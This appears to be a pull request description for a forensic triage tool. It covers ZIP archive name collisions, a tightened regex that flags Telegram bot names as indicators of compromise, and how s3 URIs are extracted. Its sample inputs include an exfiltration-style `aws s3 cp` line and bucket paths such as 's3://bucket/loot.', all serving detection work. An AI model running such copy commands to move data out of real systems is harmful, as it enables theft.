- **The generated `archive-manifest.json`**, pushed into the entry list after the loop and so never in the collision namespace. `buildZip` accepts a duplicate entry name without complaint, so a case file of that name was silently shadowed by the manifest.
- **Case-only aliases** (#426). `imports/Data` beside `imports/data` restores on Linux and loses a file on Windows.

This matters more here than in the export: `POST /cases/:id/archive` also backs the delete-with-archive flow, where the ZIP becomes the case's only copy before the directory is removed. A name dropped there is evidence lost outright, with no error and no original to compare against.

Rather than reimplement the checks, `portableArchivePaths` and `destinationKey` move from `caseExportArchive.ts` to `storage/portableFilename.ts` and both writers call them. `storage/` is where they belong and already holds `portableZipSegment`: the rules are about filesystems, not ZIP, and the two writers sit in different analysis tiers so neither may import the other. One definition means the two cannot drift apart again.

The claim also runs before the first byte is read, matching the export. `archiveCase` checks the unprefixed entry names — every entry sits under the same case-id prefix, so the prefix can neither create a collision nor hide one.

## #743 — `TEXT_BOT_ASSIGNED` key anchor too loose

The pattern documented that "the KEY must name a bot too" but only required the key to *contain* the three letters (`\w*bot\w*`). `robot` contains them, so a home-automation line or a config default minted a Telegram-bot IOC.

**The fix proposed in the issue does not work.** As that issue itself conceded in a trailing note, its regex still matched `$robot = "vacuum_bot"` — its own headline example. The real defect is the missing word boundary. A key that names a bot field puts `bot` at a token boundary: at the start (`botname`, `BOT_TOKEN`), after an underscore (`alert_bot`), or as a camelCase hump (`AlertBotUsername`).

Detecting the hump needs the case, so the regex is no longer `/i` — and because it is not, the `bot` the *value* must end in is spelled out case-insensitively rather than left to the flag, since Telegram usernames are case-insensitive.

The issue's third example, `myRabbitBot: "fluffbot"`, never matched at all: the value is 8 characters against a 9-character floor.

Verified against the live pattern, before and after:

| Input | Before | After |
| --- | --- | --- |
| `$robot = "vacuum_bot"` | `@vacuum_bot` | none |
| `robot_name: "placeholderbot"` | `@placeholderbot` | none |
| `AlertBotUsername = "bissapwned_bot"` | kept | kept |
| `AlertBotUsername = "BissaPwned_Bot"` | kept | kept |
| `botname` / `alert_bot` / `BOT_TOKEN` | kept | kept |

285KB of script block matches in 4.9ms, so the added alternation carries no backtracking cost.

## #744 — `TEXT_S3_URI` kept trailing sentence punctuation

The s3 pass stored whatever punctuation the sentence ended with, while the URL pass four lines above already stripped it. The same destination written as an https URL and as an s3 URI produced two indicators, and the s3 one was not a usable URI.

## Codex review findings

A Codex review of the branch found two regressions in the new code. Both were real and are fixed here.

**Character-wise case folding.** `destinationKey` folded the whole string with `toUpperCase()`, which applies Unicode's *full* case mappings — `ß` expands to `SS`, the ligature `ﬀ` to `FF`. Windows folds character-wise and does no such expansion, so a case holding `straße.txt` beside `strasse.txt` folded to one key and the archive was refused. The defect predates this branch, but only reached the plain-ZIP writer when `archiveCase` started sharing the key. Refusing is not the safe direction in delete-with-archive: a refused archive is a case that cannot be preserved at all. Folding is now per code point, discarding any mapping that changes the code-point count.

**Quoted URIs.** The trailing-punctuation strip was unconditional, so it also cut punctuation that was real data. An S3 object key may legally end in a dot, and `aws s3 cp x 's3://bucket/evidence.'` names exactly that key — the closing quote says where the value ends. A URI now counts as quote-delimited only when the character immediately before it opens a quote **and** the character immediately after closes the same one, so `he said "go to s3://bucket/loot."` still strips. Both the URL and s3 passes call one function for this; giving only the s3 pass the quote rule would have recreated the disagreement #744 was filed about, in the other direction.

The identical strip in `analysis/cybertriageImport.ts` is untouched and still unconditional — a separate importer, outside this change.

## Verification

Every fix was written test-first; each new test failed for the right reason before the change.

| Gate | Result |
| --- | --- |
| Full suite | 706/706 files, 11299/11299 tests, exit 0 |
| `typecheck`, `lint`, `format:check` | pass |
| `check:size`, `check:imports`, `check:boundaries` | pass |
| `eval:change-gate`, `check:us-map` | pass |

An earlier full run reported 19 failures. None were real: other worktrees were running vitest and eslint concurrently at load 65 on 8 cores, and every failure was a bare timeout with no assertion. That run also carried 12 `[vitest-worker]: Timeout calling "onTaskUpdate"` rejections and its `Test Files` line read `7 failed | 695 passed (703)` — one file short of adding up, meaning unknown rather than passing. The clean run above accounts for every file and test with no lost task updates.

Closes #742
Closes #743
Closes #744

🤖 Generated with [Claude Code](https://claude.com/claude-code)